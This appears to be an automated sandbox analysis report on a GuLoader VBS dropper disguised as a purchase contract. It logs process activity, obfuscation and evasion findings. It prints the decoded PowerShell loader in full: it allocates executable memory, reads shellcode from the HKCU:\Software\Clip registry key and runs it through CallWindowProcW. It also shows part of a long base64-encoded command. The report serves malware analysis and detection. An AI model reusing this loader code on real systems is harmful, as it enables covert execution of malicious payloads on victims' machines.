Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220126 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gz54gho0.0ha.ps1 Jump to behavior
Source: classification engine Classification label: mal84.troj.evad.winVBS@8/10@0/0
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7152:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("C:\Windows\SysWOW64\WindowsPowerShell\v", "-NoExit -EncodedCommand "IwBlAHIAaAB2AG", "", "", "0")
Yara detected GuLoader
Source: Yara match File source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0327A067 push esp; retf 5_2_0327A079
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0327C489 push esp; retf 5_2_0327C495
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0327FC62 push edi; retf 5_2_0327FC66
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline Jump to behavior

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4692 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6194 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2196 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000005.00000002.877925546.0000000005566000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: m:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V

Anti Debugging
barindex
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0)
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded #erhvervsku Lejesvende9 Archai8 Sags droshkiesh landska witchbel Hydrant Scullsba airburstu retributo dagpaafu UPTHR morpionf Add-Type -TypeDefinition @"using System;using System.Runtime.InteropServices;public static class SYDYEMENIT1{[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);}"@#fern CAMPHIRE FJEDREN CAPSICIN Scarfedent Inte9 AZYM FIGUR Afgiftsn3 unthornl Sauss3 NOLE Heedlessb MINERA Vinddrevet OPHIDIO MAGNETISE galv miltenes XENO Alle5 nonmonist $SYDYEMENIT3=0;$SYDYEMENIT9=1048576;$SYDYEMENIT8=[SYDYEMENIT1]::NtAllocateVirtualMemory(-1,[ref]$SYDYEMENIT3,0,[ref]$SYDYEMENIT9,12288,64)$Stenf=(Get-ItemProperty -Path "HKCU:\Software\Clip").One$TALAR = [System.Byte[]]::CreateInstance([System.Byte],$Stenf.Length / 2)For($i=0; $i -lt $Stenf.Length; $i+=2){ $TALAR[$i/2] = [convert]::ToByte($Stenf.Substring($i, 2), 16) }for($Lykkedrmb=0; $Lykkedrmb -lt $TALAR.count ; $Lykkedrmb++){[SYDYEMENIT1]::RtlMoveMemory($SYDYEMENIT3+$Lykkedrmb,[ref]$TALAR[$Lykkedrmb],1)}[SYDYEMENIT1]::CallWindowProcW($SYDYEMENIT3, 0,0,0,0) Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw
